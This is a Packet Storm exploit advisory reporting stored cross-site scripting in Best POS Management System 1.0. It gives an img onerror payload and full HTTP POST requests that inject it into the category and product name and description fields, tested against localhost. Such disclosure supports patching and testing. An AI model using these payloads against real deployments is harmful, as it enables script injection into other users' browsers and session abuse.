exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Best POS Management System 1.0 Cross Site Scripting

Best POS Management System 1.0 Cross Site Scripting
Posted Feb 17, 2023
Authored by Ahmed Ismail

Best POS Management System version 1.0 suffers from multiple persistent cross site scripting vulnerabilities.

tags | exploit, xss
SHA-256 | 65540cda9a5044b98904f5c7344b4da99770506e9ddaa56169a2197b44ef3845

Best POS Management System 1.0 Cross Site Scripting

Change Mirror Download
# Exploit Title: Stored Cross Site Scripting on Best pos Management System
# Google Dork: NA
# Date: 14/2/2023
# Exploit Author: Ahmed Ismail (@MrOz1l)
# Vendor Homepage:
https://www.sourcecodester.com/php/16127/best-pos-management-system-php.html
# Software Link:
https://www.sourcecodester.com/sites/default/files/download/mayuri_k/kruxton.zip
# Version: 1.0
# Tested on: Windows 11
# CVE : NA

# Description

Payload : "><img src=x onerror=prompt(document.domain);>

# POC :
1- Head to Add Category on
"http://localhost/kruxton/index.php?page=add-category"

2- On Name Parameter add our Payload "><img src=x
onerror=prompt(document.domain);>

3- After Adding This Category XSS will run


```


POST /kruxton/ajax.php?action=save_category HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)
Gecko/20100101 Firefox/109.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data;
boundary=---------------------------7128987773293048653857517
Content-Length: 442
Origin: http://localhost
Connection: close
Referer: http://localhost/kruxton/index.php?page=add-category
Cookie: PHPSESSID=61ubuj4m01jk5tibc7banpldao
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------7128987773293048653857517
Content-Disposition: form-data; name="id"


-----------------------------7128987773293048653857517
Content-Disposition: form-data; name="name"

XSSPOC"><img src=x onerror=prompt(document.domain);>
-----------------------------7128987773293048653857517
Content-Disposition: form-data; name="description"

This is POC
-----------------------------7128987773293048653857517--
```



--------------------------------------



# Exploit Title: Stored Cross Site Scripting on Best pos Management System
# Google Dork: NA
# Date: 17/2/2023
# Exploit Author: Ahmed Ismail (@MrOz1l)
# Vendor Homepage:
https://www.sourcecodester.com/php/16127/best-pos-management-system-php.html
# Software Link:
https://www.sourcecodester.com/sites/default/files/download/mayuri_k/kruxton.zip
# Version: 1.0
# Tested on: Windows 11
# CVE : NA


Payload : "><img src=x onerror=prompt(document.domain);>

# POC :
1- Head to Add Category on
"http://localhost/kruxton/ajax.php?action=save_product"

2- On Name Parameter add our Payload "><img src=x
onerror=prompt(document.domain);>

on description <img src=x onerror=prompt(2);>

3- After Adding This Category XSS will run





```

POST /kruxton/ajax.php?action=save_product HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)
Gecko/20100101 Firefox/109.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data;
boundary=---------------------------11015616619250686693182759357
Content-Length: 830
Origin: http://localhost
Connection: close
Referer: http://localhost/kruxton/index.php?page=add-product
Cookie: PHPSESSID=<COOKIE>
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------11015616619250686693182759357
Content-Disposition: form-data; name="id"


-----------------------------11015616619250686693182759357
Content-Disposition: form-data; name="category_id"

3'
-----------------------------11015616619250686693182759357
Content-Disposition: form-data; name="name"

XSSPOC2"><img src=x onerror=prompt(document.domain);>
-----------------------------11015616619250686693182759357
Content-Disposition: form-data; name="description"

XSSPOC2"><img src=x onerror=prompt(2);>
-----------------------------11015616619250686693182759357
Content-Disposition: form-data; name="price"

1122
-----------------------------11015616619250686693182759357
Content-Disposition: form-data; name="status"

1
-----------------------------11015616619250686693182759357--

```
Login or Register to add favorites

File Archive:

August 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    15 Files
  • 2
    Aug 2nd
    22 Files
  • 3
    Aug 3rd
    0 Files
  • 4
    Aug 4th
    0 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    11 Files
  • 7
    Aug 7th
    43 Files
  • 8
    Aug 8th
    0 Files
  • 9
    Aug 9th
    0 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    0 Files
  • 13
    Aug 13th
    0 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    0 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close